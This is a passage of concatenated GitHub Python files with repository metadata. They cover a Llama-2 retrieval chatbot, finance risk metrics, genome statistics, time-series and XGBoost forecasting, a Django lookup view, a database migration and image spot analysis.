get_response_from_qa_chain(lm, prompt, db):\n retreival_chain = RetrievalQA.from_chain_type(llm=lm,\n chain_type=\"stuff\",\n retriever=db.as_retriever(search_kwargs={\"k\": 1}),\n return_source_documents=True,\n chain_type_kwargs={\"prompt\": prompt})\n return retreival_chain\n\n\n#Loading the local model into LLM\ndef load_llama2_llm():\n # Load the model 1lama-2-7b-chat.ggmlv3.q8_0.bin that was downloaded locally\n llm = CTransformers(\n model = \".venv/llama-2-7b-chat.ggmlv3.q8_0.bin\",\n model_type=\"llama\",\n max_new_tokens = 32000,\n temperature = 0.5\n )\n\n # model_repo = 'daryl149/llama-2-7b-chat-hf'\n\n # tokenizer = AutoTokenizer.from_pretrained(model_repo, use_fast=True)\n\n # model = AutoModelForCausalLM.from_pretrained(\n # model_repo,\n # load_in_4bit=True,\n # device_map='auto',\n # torch_dtype=torch.float16,\n # low_cpu_mem_usage=True,\n # trust_remote_code=True\n # )\n\n # max_len = 2048\n # pipe = pipeline(\n # task = \"text-generation\",\n # model = model,\n # tokenizer = tokenizer,\n # pad_token_id = tokenizer.eos_token_id,\n # max_length = max_len,\n # temperature = 0,\n # top_p = 0.95,\n # repetition_penalty = 1.15\n # )\n\n # llm = HuggingFacePipeline(pipeline = pipe)\n \n return llm\n\n\n# answering bot creation\ndef answering_bot():\n embeddings = HuggingFaceEmbeddings(model_name=\"sentence-transformers/all-MiniLM-L6-v2\",\n model_kwargs={'device': 'cpu'})\n\n vectorstore = FAISS.load_local(DB_FAISS_PATH, embeddings)\n llm = load_llama2_llm()\n message_prompt = create_prompt()\n response = get_response_from_qa_chain(llm, message_prompt, vectorstore)\n\n return response\n\n#display the result of the question asked\ndef final_result(query):\n bot_result = answering_bot()\n bot_response = bot_result({'query': query})\n return bot_response\n\n#chainlit code you can refer to the chainlit.io website for more details.\n@ct.on_chat_start\nasync def start():\n chain = answering_bot()\n msg = ct.Message(content=\"The bot is getting initialized, please wait!!\")\n await msg.send()\n msg.content = \"Q&A bot is ready. Ask questions on the documents indexed?\"\n await msg.update()\n ct.user_session.set(\"chain\", chain)\n\n@ct.on_message\nasync def main(message):\n chain = ct.user_session.get(\"chain\")\n cb = ct.AsyncLangchainCallbackHandler(\n stream_final_answer=True, answer_prefix_tokens=[\"FINAL\", \"ANSWER\"]\n )\n cb.answer_reached = True\n res = await chain.acall(message.content, callbacks=[cb])\n answer = res[\"result\"]\n print(answer)\n await ct.Message(content=answer).send()","repo_name":"arupnayak/llama2-faiss-chat","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26332046079","text":"\r\ndef mystery(a):\r\n i=0\r\n for i in range (len(a)-2 , 0, -1):\r\n if (a[i + 1] <= a[i - 1]):\r\n a[i] += 1\r\n \r\ndef main ():\r\n a1=42\r\n mystery(a1)\r\n print (mystery)\r\nmain()\r\n","repo_name":"daniela-mejia/Python-Net-idf19-","sub_path":"PhythonAssig/5-15-19 Assigment 12/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36700295907","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.stats as sts\nimport numpy as np\nimport seaborn as sns\n\n\n\ndef drawdown(return_series: pd.Series):\n \"\"\"\n Takes a time series of assets return\n return a dataframe with columns for \n the wealth index\n the previous peak, and \n percentage drawdown\n\n \"\"\"\n weath_index = 1000*(1+return_series).cumprod()\n previous_peak = weath_index.cummax()\n drawdown = (weath_index-previous_peak)/previous_peak\n return pd.DataFrame({\n \"wealth\": weath_index,\n \"previous_peak\": previous_peak,\n \"drawdown\": drawdown\n })\n\ndef get_ffme_return():\n \"\"\"\n load the fame-french dataset for the return of the Top and Bottom Deciles marketcap\n \"\"\"\n me_n = pd.read_csv(r\"C:\\Users\\Sumeet Maheshwari\\Desktop\\data dump\\VweKqLJfEemJ1w4LYV5qDg_2c089d97f24e49daa70b757b8337a76f_data (1)\\data\\Portfolios_Formed_on_ME_monthly_EW.csv\")\n rst = me_n[[\"Lo 10\",\"Hi 10\" ]]\n rst.columns = ['small_cap','large_cap']\n rst = rst/100\n rst.index = pd.to_datetime(rst.index, format=\"%Y%m\", errors='coerce').to_period(\"M\")\n return rst\n\ndef get_hfi_returns():\n \"\"\"\n Load and format the EDHEC Hedge Fund Index Returns\n \"\"\"\n hfi = pd.read_csv(r\"C:\\Users\\Sumeet Maheshwari\\Desktop\\data dump\\VweKqLJfEemJ1w4LYV5qDg_2c089d97f24e49daa70b757b8337a76f_data (1)\\data\\edhec-hedgefundindices.csv\",\n header=0, index_col=0, parse_dates=True)\n hfi = hfi/100\n hfi.index = hfi.index.to_period('M')\n return hfi\n\n\ndef skewness(r):\n \"\"\"\n Alternative to scipy.stats.skew()\n Computes the skewness of the supplied Series or DataFrame\n Returns a float or a Series\n \"\"\"\n demeaned_r = r - r.mean()\n # use the population standard deviation, so set dof=0\n sigma_r = r.std(ddof=0)\n exp = (demeaned_r**3).mean()\n return exp/sigma_r**3\n\ndef plot_skewness(data = pd.DataFrame):\n #data = skewness(data)\n data = pd.Series(data.skew().sort_values())\n\n # Plot skewness values\n plt.figure(figsize=(10, 6))\n data.plot(kind='bar', color='skyblue')\n plt.title('Skewness of Data')\n plt.xlabel('Columns')\n plt.ylabel('Skewness')\n plt.show()\n\ndef kurtosis(r):\n \"\"\"\n Alternative to scipy.stats.kurtosis()\n Computes the kurtosis of the supplied Series or DataFrame\n Returns a float or a Series\n \"\"\"\n demeaned_r = r - r.mean()\n # use the population standard deviation, so set dof=0\n sigma_r = r.std(ddof=0)\n exp = (demeaned_r**4).mean()\n return exp/sigma_r**4\n\n\ndef is_normal(r, level = 0.01):\n '''\n Applies the jarque Bera test to determine if serires is normal or not \n test is applied at the 1% level by default\n returns True if the hypothesis of normal is accepted, fales ortherwise\n '''\n statistic , p_value = sts.jarque_bera(r)\n return p_value > level\n\ndef semideviation3(r):\n \"\"\"\n Returns the semideviation aka negative semideviation of r\n r must be a Series or a DataFrame, else raises a TypeError\n \"\"\"\n excess= r-r.mean() # We demean the returns\n excess_negative = excess[excess<0] # We take only the returns below the mean\n excess_negative_square = excess_negative**2 # We square the demeaned returns below the mean\n n_negative = (excess<0).sum() # number of returns under the mean\n return (excess_negative_square.sum()/n_negative)**0.5 # semideviation\n\n\n\ndef var_historic(r, level = 5):\n \"\"\"\n VaR historic\n \"\"\"\n if isinstance(r, pd.DataFrame):\n return r.aggregate(var_historic,level = level)\n elif isinstance(r, pd.Series):\n return -np.percentile(r, level)\n else:\n raise Exception(\"Expected r to be a Series or Dataframe\")\n \n\ndef var_gaussian(r, level=5, modified = False):\n \"\"\"\n compute Z score assuming it was Guassian \n \"\"\"\n z = sts.norm.ppf(level/100)\n if modified:\n # modifiy the Z score based on observed skewness and Krutosis\n s = skewness(r)\n k = kurtosis(r)\n z = z + (\n (z**2 -1)*s/6 +(z**3 -3*z)*(k-3)/24 - (2*z**3 - 5*z)*(s**2)/36\n )\n\n return abs(r.mean() + z*r.std(ddof =0))\n\ndef plot_var_comparision(var_list: list):\n comparsion = pd.concat(var_list, axis=1)\n comparsion.columns = ['Gaussian','cornish-Fisher','historic']\n comparsion.plot.bar(title ='EDHEC Hedge Fund Indices: VaR')\n\n\ndef cvar_historic(r,level=5):\n '''\n computes the Conditional VaR of Series or DataFrame\n '''\n if isinstance(r,pd.Series):\n is_beyond = r <= -var_historic(r, level = level)\n return -r[is_beyond].mean()\n elif isinstance(r,pd.DataFrame):\n return r.aggregate(cvar_historic, level = level)\n else:\n raise Exception(\"Expected r to be a Series or Dataframe\")\n\n\n\n\n","repo_name":"sumeet0701/Portfolio_Construction_python","sub_path":"risk1.py","file_name":"risk1.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18219861493","text":"import sys\nimport csv\nimport argparse\nfrom collections import defaultdict\n\nimport numpy as np\nimport pyrodigal\nimport Bio.SeqIO\n\nimport frames\nimport code\n\ndef nucleotid_count(sequence):\n result = {nt: 0 for nt in \"ATCGN\"}\n for nt in sequence:\n result[nt] += 1\n return result\n\ndef calculate_gc_content(sequence):\n nts = nucleotid_count(sequence)\n gc_count = nts['C'] + nts['G']\n return (gc_count / len(sequence)) if sequence else 0\n\ndef main():\n parser = argparse.ArgumentParser(\n prog='fasta_stats.py',\n description='print stats for a fasta file'\n )\n parser.add_argument('files', metavar='FILE', type=str, nargs='+', help=\"input file, default stdin\")\n args = parser.parse_args()\n\n tsv_writer = csv.writer(sys.stdout, delimiter=\"\\t\")\n\n for file in args.files:\n row = []\n\n print(file, file=sys.stderr)\n print(\"reading fasta from \" + file, file=sys.stderr)\n global sequences\n sequences = list(Bio.SeqIO.parse(file, \"fasta\"))\n\n # TODO extend to multi chromosomes\n if len(sequences) != 1:\n print(\"expecting exactly one sequence in fasta, found len(sequences)\")\n sys.exit(1)\n\n row.append(sequences[0].id)\n\n global sequence\n sequence = str(sequences[0].seq)\n\n print(\"finding genes\", file=sys.stderr)\n gene_finder = pyrodigal.GeneFinder()\n gene_finder.train(sequence)\n\n global genes\n genes = gene_finder.find_genes(sequence)\n\n print(\"calculating statistics\", file=sys.stderr)\n\n sequence_lengths = [g.end - g.begin + 1 for g in genes]\n\n # Whole genome length\n genome_length = len(sequence)\n print(f\"Length of Genome: {genome_length}\", file=sys.stderr)\n row.append(genome_length)\n\n # Total Length of all Genes\n genes_total_length = sum(sequence_lengths)\n print(f\"Total length of all genes: {genes_total_length} bases\", file=sys.stderr)\n row.append(genes_total_length)\n\n # Number of Genes\n genes_length = len(genes)\n print(f\"Number of genes: {genes_length}\", file=sys.stderr)\n\n # Genes Length Statistics\n min_length = min(sequence_lengths)\n max_length = max(sequence_lengths)\n quartiles_length = np.percentile(sequence_lengths, [25, 50, 75])\n print(f\"Length Min/Quartiles/Max: {min_length}, {quartiles_length[0]}, {quartiles_length[1]}, {quartiles_length[2]}, {max_length}\", file=sys.stderr)\n row += [min_length, *quartiles_length, max_length]\n\n # GC Content\n genome_gc = calculate_gc_content(sequence)\n print(f\"Whole Genome GC Conent: {genome_gc*100:0.4f}%\", file=sys.stderr)\n row.append(genome_gc)\n\n gc_contens = [ calculate_gc_content(g.sequence()) for g in genes ]\n min_gc = min(gc_contens)\n max_gc = max(gc_contens)\n quartiles_gc = np.percentile(gc_contens, [25, 50, 75])\n print(f\"Length Min/Quartiles/Max: {min_gc*100:0.4f}%, {quartiles_gc[0]*100:0.4f}%, {quartiles_gc[1]*100:0.4f}%, {quartiles_gc[2]*100:0.4f}%, {max_gc*100:0.4f}%\", file=sys.stderr)\n row += [min_gc, *quartiles_gc, max_gc]\n\n # Coding Density\n coding_density = genes_total_length / (genome_length * 2) # Count Forward and Backward Strand\n print(f\"Coding Density: {coding_density*100: 0.4}%\", file=sys.stderr)\n row.append(coding_density)\n\n # Start Codonsstart_codons\n start_codons = defaultdict(int)\n for g in genes:\n start_codons[g.start_type] += 1\n \n row.append(start_codons.get(\"ATG\", 0))\n row.append(start_codons.get(\"GTG\", 0))\n row.append(start_codons.get(\"TTG\", 0))\n row.append(start_codons.get(\"Edge\", 0))\n start_codon_count = sum(start_codons.values())\n start_codons = sorted(list(start_codons.items()), key=lambda x: -x[1])\n start_codons = \", \".join(f\"{codon}: {float(count)/start_codon_count*100:0.4f}%\" for codon, count in start_codons)\n print(f\"Start Codon Distribution: {start_codons}\", file=sys.stderr)\n\n # codon usage in genome\n codon_counts = defaultdict(int)\n for seq in frames.frames(sequence):\n for (_, codon) in seq:\n codon_counts[codon] += 1\n codon_count = sum(codon_counts.values())\n codon_counts_row = sorted(codon_counts.items(), key=lambda x: code.codon_sort_key(x[0]))\n row += [ float(c) / codon_count for _, c in codon_counts_row]\n codon_counts_print = sorted(codon_counts.items(), key=lambda x: -x[1])\n codon_counts_print = \", \".join(f\"{codon}: {float(count) / codon_count * 100:0.4f}%\" for codon, count in codon_counts_print)\n print(f\"Codon Distribution Whole Genome: {codon_counts_print}\", file=sys.stderr)\n\n # codon usage in genes\n codon_counts = defaultdict(int)\n for gene in genes:\n for (_, codon) in frames.codons(gene.sequence()):\n codon_counts[codon] += 1\n codon_count = sum(codon_counts.values())\n codon_counts_row = sorted(codon_counts.items(), key=lambda x: code.codon_sort_key(x[0]))\n row += [ float(c) / codon_count for _, c in codon_counts_row]\n codon_counts_print = sorted(codon_counts.items(), key=lambda x: -x[1])\n codon_counts_print = \", \".join(f\"{codon}: {float(count) / codon_count * 100:0.4f}%\" for codon, count in codon_counts_print)\n print(f\"Codon Distribution Genes: {codon_counts_print}\", file=sys.stderr)\n\n tsv_writer.writerow(row)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Roxxik/jlu-bio","sub_path":"ueb04/analyse_genome.py","file_name":"analyse_genome.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"341145025","text":"from pandas import read_csv\nfrom pandas import datetime\nfrom pandas import DataFrame\nfrom matplotlib import pyplot\nfrom sklearn.metrics import mean_squared_error\nfrom matplotlib.pylab import rcParams\nfrom statsmodels.tsa.ar_model import AR\n\nrcParams['figure.figsize'] = 15, 6\n\n\ndef parser(dates):\n return datetime.strptime(dates, '%Y-%m-%d %H')\n\n\n# read the data in\nfeature_SEA = \"/Users/ramanathan/Google Drive/Arizona State University/Spring 2017/Statistical Machine Learning/Project/code/WeatherForecastingSML/dataset/feature_CIN.csv\"\nseries = read_csv(feature_SEA, header=0, parse_dates=[0], index_col=0, squeeze=True, date_parser=parser)\n\nts = series['12']\n\nX = ts\nnumber_of_days = 365\nnumber_of_hours = 365 * 24\n\ntrain, test = X[1:len(X) - number_of_hours], X[len(X) - number_of_hours:]\n\n# train autoregression\nmodel = AR(train)\nmodel_fit = model.fit()\n\nwindow = model_fit.k_ar\ncoefficient = model_fit.params\nprint('Lag: %s' % model_fit.k_ar)\nprint('Coefficients: %s' % model_fit.params)\n\n# walk forward over time steps in test\nhistory = train[len(train) - window:]\nhistory = [history[i] for i in range(len(history))]\npredictions = list()\nfor t in range(len(test)):\n length = len(history)\n lag = [history[i] for i in range(length - window, length)]\n yhat = coefficient[0]\n for d in range(window):\n yhat += coefficient[d + 1] * lag[window - d - 1]\n obs = test[t]\n predictions.append(yhat)\n history.append(obs)\n print('predicted=%f, expected=%f' % (yhat, obs))\nerror = mean_squared_error(test, predictions)\nprint('Test MSE: %.3f' % error)\n\n# plot\npyplot.plot(test)\ntitle = 'AR Model Predictions for Cincinnati'\npyplot.title(title)\npyplot.xlabel('Hourly Test Data Points (2016)')\npyplot.ylabel('Temperature (F)')\npyplot.plot(predictions, color='#ef9058')\npyplot.show()\n\n# Reference : http://machinelearningmastery.com/autoregression-models-time-series-forecasting-python/\n","repo_name":"yeskarthik/WeatherForecastingSML","sub_path":"src/arima/TimeSeriesARModeling.py","file_name":"TimeSeriesARModeling.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72844104222","text":"import sys\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport utils\n\nalphabets = '0123456789abcdefghijklmnopqrstuvwxyz'\n\ndef postpossess(bin_path):\n converter = utils.strLabelConverter(alphabets)\n preds = np.fromfile(bin_path, dtype=np.float32)\n preds = preds.reshape(26,-1,37)\n preds = torch.from_numpy(preds)\n _, preds = preds.max(2)\n preds = preds.transpose(1, 0).contiguous().view(-1)\n preds_size = Variable(torch.IntTensor([preds.size(0)]))\n raw_pred = converter.decode(preds.data, preds_size.data, raw=True)\n sim_pred = converter.decode(preds.data, preds_size.data, raw=False)\n print('%-20s => %-20s' % (raw_pred, sim_pred))\n\nif __name__ == '__main__':\n bin_path = sys.argv[1]\n postpossess(bin_path)\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"ACL_PyTorch/built-in/cv/CRNN_meijieru_for_Pytorch/postpossess_CRNN_pytorch.py","file_name":"postpossess_CRNN_pytorch.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"24199330591","text":"import pandas as pd\nimport csv\nimport unicodedata\n\n# https://stackoverflow.com/a/29247821/6669540\ndef normalize_caseless(text):\n return unicodedata.normalize(\"NFKD\", text.casefold())\n\ndef caseless_equal(left, right):\n return normalize_caseless(left) == normalize_caseless(right)\n\ndef num(s):\n s = s.strip()\n return int(s) if s else 0\n\nCAPITA_CONST = 100000\n\nlib_file = open('raw/country-libs.csv')\nlibs = csv.DictReader(lib_file)\n\npop_file = open('raw/country-pop-worldbank.csv')\npops = csv.DictReader(pop_file)\n\nhomicide_file = open('cleaned/homicide-country.csv')\nhomicides = csv.DictReader(homicide_file)\n\nrows = []\n\nfor pop in pops:\n country = pop['Country Name']\n population = num(pop['2016'])\n row = {\n 'Country': country,\n 'Population': population\n }\n\n for lib in libs:\n if caseless_equal(lib['Country'], country):\n libraries = num(lib['Public Libraries'])\n libs_per_capita = libraries/population*CAPITA_CONST if (libraries > 0 and population > 0) else -1\n if libs_per_capita > 0:\n row['Libraries'] = libraries\n row['Libraries per Capita'] = libs_per_capita\n break\n\n for homicide in homicides:\n if caseless_equal(homicide['Country'], country):\n row['Homicides'] = homicide['Count']\n row['Homicides per Capita'] = homicide['Rate']\n break\n\n if ('Libraries per Capita' in row.keys() and 'Homicides per Capita' in row.keys()):\n rows.append(row)\n\n lib_file.seek(0)\n homicide_file.seek(0)\n\ndf = pd.DataFrame(rows)\ndf.to_csv('cleaned/homicides-libraries.csv', index=False)\n","repo_name":"ruddfawcett/stats530","sub_path":"mergers/homicide-lib.py","file_name":"homicide-lib.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9644676806","text":"# create a bank account. Saving account with minimum 500 balance and current account with no minimum balance.\n\naccountNo = input(\"enter Account Number: \")\ncustomerName = input(\"Enter Customer Name: \")\naccountType = input(\"Enter Account Type: \")\nbalance = float(input(\"Enter Balance: \"))\n\n\ndef showAccount():\n print(f\"Account: {accountNo} \\n\"\n f\"Customer Name: {accountType} \\n\"\n f\"Account Type: {accountType} \\n\"\n f\"Balance: {balance}\")\n\n\ndef withdraw(balance, amount, accountType):\n if accountType == \"SAVINGS\":\n new_balance = balance - amount\n if new_balance < 500:\n raise Exception(\"Insufficient Balance\")\n else:\n balance = new_balance\n return balance\n elif accountType == \"CURRENT\":\n balance = balance - amount\n return balance\n\n\nshowAccount()\namount = float(input(\"Enter amount to be withdraw: \"))\ntype = \"SAVINGS\"\nbalance = withdraw(balance, amount, type)\nprint(\"After withdrawing\")\nshowAccount()\n","repo_name":"amalpushp77/complete-python-tutorial","sub_path":"2. Python Part 2 - OOP/Practical Examples/7. TraditionalStyle.py","file_name":"7. TraditionalStyle.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7615784568","text":"#标准的库导入\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport re\nimport matplotlib.pylab as plt\nfrom math import sqrt\nimport os\n\nfrom matplotlib.pyplot import rcParams\nrcParams['figure.figsize']=15,6\n\n# 预处理和划分数据\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\n\n# 导入模型\nimport xgboost as xgb\n\n#模型调参的工具\nfrom sklearn.model_selection import cross_val_score,KFold\nfrom sklearn.model_selection import GridSearchCV\n\n#模型保存工具\nfrom sklearn.externals import joblib\n\n#Error metrics\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# import the data\n# dataparse = lambda dates: datetime.strptime(dates, '%Y-%m-%d')\n# data = pd.read_excel('xxxx/acitivedata.xlsx', pares_dates=['Day'], index_col='Day', date_parser=dataparse)\n#\n# # get seperate date\n# ts1 = data['login']\n# ts2 = data['delivery']\n# ts3 = data['registration']\n#\n# # 数据的异常点处理\n# ts3['2016-09-23'] = ts3['2016-09-22']\n#\n# ts2['2016-09-24'] = ts2['2016-09-17']\n# ts2['2016-09-25'] = ts2['2016-09-18']\n#\n# ts1['2016-09-24'] = ts1['2016-09-17']\n# ts1['2016-09-25'] = ts1['2016-09-18']\n#\n# # 将数据进行监督序列的转化\n# X = ts1.as_matrix()\n# # 将序列转化为监督序列\n# lag = 7\n#\n# X_matrix = []\n# y = []\n# for i in range(len(X) - lag):\n# sample = []\n# for n in range(lag):\n# sample.append(X[i + n])\n#\n# X_matrix.append(sample)\n# y.append(X[i + lag])\n#\n# # 这是最后7个点数据,来预测新的一天\n# X_test_predict = []\n# for i in range(lag):\n# X_test_predict.append(X[-(lag - i)])\n#\n# X_matrix.append(X_test_predict)\n#\n# XX = np.array(X_matrix)\n# y = np.array(y)\n\nimport pymysql\nconn = pymysql.connect(\"localhost\", \"root\", \"hj123456\", \"mcm\",3306,charset=\"utf8mb4\")\n # 创建游标对象\ncursor = conn.cursor()\n# sql = \"select product_id, count(product_id) from pacifier group by product_id order by count(product_id) DESC\"\n# sql = \"select product_title, count(product_title) from pacifier group by product_title order by count(product_title) DESC\"\nsql = \"select DATEdiff(review_date,'2004-6-19') from microwave where product_parent = '423421857' group by DATEdiff(review_date,'2004-6-19') order by DATEdiff(review_date,'2004-6-19') ASC\"\n\n# sql = 'select star_rating, count(star_rating) from microwave where verified_purchase=\"Y\" group by star_rating'\n\ncursor.execute(sql)\nres = cursor.fetchall()\n\n\nlens = len(res)\nX_train = np.zeros((lens,1),dtype=float)\ny_train = np.zeros((lens,1),dtype=float)\nfor i in range(lens):\n print(res[i][0])\n X_train[i] = res[i][0] - 2558\n\n\n\n\n# 定义训练数据\n\n\nsql = \"select avg(scores) from microwave where product_parent = '423421857' group by DATEdiff(review_date,'2004-6-19') order by DATEdiff(review_date,'2004-6-19') ASC\"\n\ncursor.execute(sql)\nres = cursor.fetchall()\n\nfor i in range(lens):\n print(res[i][0])\n y_train[i] = res[i][0]\n\n\n\ncursor.close()\nconn.close()\n\n\n\n\n# setup regressor\nxgb_model = xgb.XGBRegressor()\n# performance a grid search\ntweaked_model = GridSearchCV(\n xgb_model,\n {\n 'max_depth':[1,2,5,10,20],\n 'n_estimators':[20,30,50,70,100],\n 'learning_rate':[0.1,0.2,0.3,0.4,0.5]\n },\n cv = 3,\n verbose = 1,\n n_jobs = -1,\n scoring = 'neg_median_absolute_error',\n)\n\ntweaked_model.fit(X_train,y_train)\nprint('Best: %f using %s'%(tweaked_model.best_score_, tweaked_model.best_params_))\n\n\n#saving and load models\ndef save_model(model,filename):\n return joblib.dump(model,filename)\n\ndef load_model(filename):\n return joblib.load(filename)\n\n#四、预测新数据\nsave_model(tweaked_model,'XGB-model_lag=7.pkl')\nmodel = load_model('XGB-model_lag=7.pkl')\n\nmodel1 = xgb.XGBRegressor(learning_rate= 0.1, max_depth= 5, n_estimators= 100)\n\nX_predict_test = np.zeros((365,1),dtype=float)\ny_predict = np.zeros((365,1),dtype=float)\n\nfor i in range(365):\n X_predict_test = X_train[lens-1] + i\n\n# model1.fit(X_predict,y_predict)\n#\n#以最后100天的数据为测试数据\nX_predict = model1.predict(X_predict_test)\n\n# plt.plot(y_train[-100:],color='blue',label='actul')\nplt.plot(X_predict,color='red',label='predict')\n# plt.legend(loc='best')\n# plt.title('RMSE:%.4f'%np.sqrt((sum((X_predict[:-1]-y_train[-100:])**2))/len(X_predict)))\n# plt.show()\n# print(\"the next day predict is %.f\"%X_predict[-1])\n\n# encoding=utf-8\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n","repo_name":"SunshineHJian/--hujian","sub_path":"code/Xgboost2.py","file_name":"Xgboost2.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"23545117307","text":"# -*- coding: utf-8 -*-\nfrom django.db.models import Q\nfrom django.db import connection # Used for django tenants.\nfrom rest_framework.views import APIView\nfrom rest_framework import authentication, permissions, status\nfrom rest_framework.response import Response\nfrom tenant_foundation.models import Customer, Organization\nfrom tenant_api.serializers.customer import CustomerRetrieveUpdateDestroySerializer\n\n\nclass FindCustomerMatchingAPIView(APIView):\n \"\"\"\n API-endpoint used for looking up an organization name to check if is unique.\n \"\"\"\n permission_classes = (\n permissions.IsAuthenticated,\n )\n\n def get(self, request):\n # Get our extracts.\n customer = None\n email = self.request.GET.get('email', None)\n company_name = self.request.GET.get('organization_name', None)\n\n if company_name is not '' and email is not '':\n print(\"Searching: company_name and email\")\n customer = Customer.objects.filter(\n email__iexact=email,\n organization__name__iexact=company_name\n ).first()\n\n elif email is '' and company_name is not '':\n print(\"Searching: company_name\")\n customer = Customer.objects.filter(\n organization__name__iexact=company_name\n ).first()\n\n elif email is not '' and company_name is '':\n print(\"Searching: email\")\n customer = Customer.objects.filter(\n email__iexact=email,\n ).first()\n\n print(\"Found\", customer)\n\n if customer:\n serializer = CustomerRetrieveUpdateDestroySerializer(customer, many=False)\n return Response(\n data=serializer.data,\n status=status.HTTP_200_OK\n )\n\n else:\n # Return our results.\n return Response(\n data={},\n status=status.HTTP_200_OK\n )\n","repo_name":"over55/workery-django","sub_path":"workery/tenant_api/views/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"7"} +{"seq_id":"42131712510","text":"\"\"\"empty message\n\nRevision ID: 3bdb97b5431d\nRevises: af7f2fd8626b\nCreate Date: 2021-08-24 16:52:31.042259\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3bdb97b5431d'\ndown_revision = 'af7f2fd8626b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user_status', schema=None) as batch_op:\n batch_op.add_column(sa.Column('growing_select', sa.Integer(), nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user_status', schema=None) as batch_op:\n batch_op.drop_column('growing_select')\n\n # ### end Alembic commands ###\n","repo_name":"kuyang95/1319_KakaoChatBot","sub_path":"migrations/versions/3bdb97b5431d_.py","file_name":"3bdb97b5431d_.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14191228583","text":"\"\"\"This function gives a vector of all the intensity of the detected spots.\n\nGiven the 3D matrices of raw data and detected spots, the output is a 7xN\nmatrix in which the components are the spot label, volume, intensity, max \nvalue and the 3 coordinates (z, x, y).\n\"\"\"\n\n\nimport numpy as np\nfrom skimage.measure import regionprops_table, regionprops\nfrom PyQt5 import QtWidgets\n\n\n\nclass SpotsIntensityRecord:\n \"\"\"Main class, does all the job\"\"\"\n def __init__(self, spts_segm, raw_spts): # input_data are: spts_segm, raw_spts\n\n if spts_segm.max() > 0:\n rgp = regionprops_table(spts_segm.astype(np.int32), raw_spts, properties=[\"label\", \"area\", \"intensity_image\", \"max_intensity\", \"centroid\"])\n rgp_cc = regionprops(spts_segm.astype(np.int32)) # regionprops to measure the centroids coordinates (the prvious gives approximation of it)\n rgp_arr = []\n for k in range(len(rgp[\"label\"])):\n rgp_arr.append([rgp_cc[k][\"label\"], int(np.round(rgp_cc[k][\"centroid\"][0])), int(np.round(rgp_cc[k][\"centroid\"][1])), int(np.round(rgp_cc[k][\"centroid\"][2]))]) # array with not approximate centroids-coordinates and label\n\n rgp_arr = np.asarray(rgp_arr) # convert to array\n \n for k in range(rgp[\"label\"].size): # substitute the approximated centroids-coordinates with the non approximated ones\n idx2subst = np.where(rgp_arr[:, 0] == rgp[\"label\"][k])[0][0] # check the indexes of the label\n rgp[\"centroid-0\"][k], rgp[\"centroid-1\"][k], rgp[\"centroid-2\"][k] = rgp_arr[idx2subst][1], rgp_arr[idx2subst][2], rgp_arr[idx2subst][3] # substitute centroids-coordinates with the proper not approximated ones\n\n spts_ints_ctrs = np.zeros((7, rgp[\"area\"].size), dtype=np.int32)\n\n pbar = ProgressBar(total1=len(rgp))\n pbar.show()\n pbar.update_progressbar(0)\n\n for k in range(rgp[\"area\"].size):\n pbar.update_progressbar(k)\n spts_ints_ctrs[:, k] = np.array([rgp['label'][k], rgp['area'][k], rgp['intensity_image'][k].sum(), rgp['max_intensity'][k], rgp['centroid-0'][k], rgp['centroid-1'][k], rgp['centroid-2'][k]])\n\n pbar.close()\n\n else:\n spts_ints_ctrs = np.array([[], []])\n \n self.spts_ints_ctrs = spts_ints_ctrs\n\n\n\nclass ProgressBar(QtWidgets.QWidget):\n \"\"\"Simple progressbar widget\"\"\"\n def __init__(self, parent=None, total1=4):\n super(ProgressBar, self).__init__(parent)\n self.name_line1 = QtWidgets.QLineEdit()\n\n self.progressbar1 = QtWidgets.QProgressBar()\n self.progressbar1.setMinimum(1)\n self.progressbar1.setMaximum(total1)\n\n main_layout = QtWidgets.QGridLayout()\n main_layout.addWidget(self.progressbar1, 0, 0)\n\n self.setLayout(main_layout)\n self.setWindowTitle(\"Progress\")\n self.setGeometry(500, 300, 300, 50)\n\n def update_progressbar(self, val1):\n \"\"\"Method to update progressbar\"\"\"\n self.progressbar1.setValue(val1)\n 